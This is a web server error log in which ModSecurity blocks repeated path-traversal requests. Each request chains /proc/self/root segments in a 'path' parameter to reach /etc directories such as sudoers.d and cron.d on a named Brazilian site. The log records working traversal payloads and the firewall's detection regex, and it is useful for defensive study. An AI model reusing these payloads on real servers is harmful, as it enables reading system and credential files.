[Tue Mar 17 21:55:05.601009 2026] [:error] [pid 11816:tid 140411565680384] [client 74.7.241.31:32916] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn36ew_le52K8_3pV15AAAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:55:05.803719 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.241.31:32916] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn36ew_le52K8_3pV15AQAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:55:07.159965 2026] [:error] [pid 18211:tid 140411616036608] [client 74.7.241.31:32920] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn36xcIZFNFgEhGGCRDkgAAA88"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:55:08.573371 2026] [:error] [pid 25836:tid 140411565680384] [client 74.7.241.31:49902] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn37Ih-PF_25v4hFRCXggAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:55:10.143097 2026] [:error] [pid 11816:tid 140411616036608] [client 74.7.241.31:49906] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn37uw_le52K8_3pV15BAAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:55:11.668251 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.241.31:49918] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn379a6ubjKNq_cu4Yy6gAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:55:13.216586 2026] [:error] [pid 17972:tid 140411540502272] [client 74.7.241.31:49926] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn38YZ5-GlpYjVrXCrhvAAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:55:15.531725 2026] [:error] [pid 17972:tid 140411658000128] [client 74.7.241.31:49936] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn384Z5-GlpYjVrXCrhvwAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:55:16.137825 2026] [proxy_fcgi:error] [pid 19507:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:45184] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:55:17.087480 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:49944] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn39da6ubjKNq_cu4Yy7wAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:55:17.546591 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.241.31:49944] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn39da6ubjKNq_cu4Yy8AAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:55:18.867464 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.241.31:58588] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn39sdf6f5d65gmYZRrUQAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:55:20.438757 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.241.31:58592] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3-Na6ubjKNq_cu4Yy8wAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:55:22.635699 2026] [:error] [pid 2598:tid 140411708356352] [client 74.7.241.31:58600] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3-hj0p0SRWAqcjGGmWgAAAwQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:55:24.127987 2026] [:error] [pid 18211:tid 140411632822016] [client 74.7.241.31:58614] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3_BcIZFNFgEhGGCRDmAAAA80"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 21:55:26.358887 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.241.31:58622] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3_uyqAr6etmhZHNpTbwAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:55:27.951511 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.241.31:36930] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn3_9Y0UrI5A3LftIwr0AAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:55:29.475435 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.241.31:36944] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4AdY0UrI5A3LftIwr0gAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:55:38.137298 2026] [proxy_fcgi:error] [pid 17887:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:45584] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:55:40.623145 2026] [:error] [pid 17972:tid 140411607643904] [client 74.7.241.31:40418] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4DIZ5-GlpYjVrXCrhyAAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:55:41.372385 2026] [:error] [pid 17972:tid 140411641214720] [client 74.7.241.31:40418] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4DYZ5-GlpYjVrXCrhyQAAAkw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:55:42.918946 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.241.31:40432] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4Dsdf6f5d65gmYZRrZAAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:55:45.786593 2026] [:error] [pid 18211:tid 140411649607424] [client 74.7.241.31:40434] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4ERcIZFNFgEhGGCRDpwAAA8s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:55:47.389216 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.241.31:50566] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4E9a6ubjKNq_cu4Yy_QAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
